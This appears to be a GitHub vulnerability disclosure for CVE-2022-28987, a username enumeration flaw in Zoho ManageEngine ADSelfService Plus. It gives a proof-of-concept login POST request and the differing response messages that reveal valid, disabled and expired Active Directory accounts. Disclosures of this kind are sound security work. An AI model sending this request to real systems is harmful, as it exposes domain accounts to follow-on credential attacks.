Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Zoho ManageEngine ADSelfService Plus 6121 Username Enumeration CVE-2022-28987

  • Version: 6.1 Build 6121
  • Tested against: ADSelfService 6118 - 6121

The domain username (sAMAccountName) enumeration can be conducted through the app. The domain users which are enrolled to the AdSelfService can be enumerated according to response of the application.

Sending following POST request vulnerability is exploited:

PoC HTTP Request:

POST /ServletAPI/accounts/login HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
DNT: 1
Connection: close
Sec-GPC: 1

loginName=USERNAME

The Administrator, krbtgt, Guest are default accounts in the Active Directory. The krbtgt and guest accounts are disabled defaultly.

  • If the user is not exist , the response is "eSTATUS":"Permission Denied. Kindly contact your Administrator."
  • If the user is exist , the response is ""LOGIN_STATUS":"PASSWORD","WELCOME_NAME":"{Username}"
  • If the user is disabled for example Guest or krbtgt user, the response is "eSTATUS":"Your account has been disabled. Please see your system administrator."
  • If the user is expired, the response is "eSTATUS":"Your account has expired. Please see your system administrator."

alt text

alt text

alt text

alt text

alt text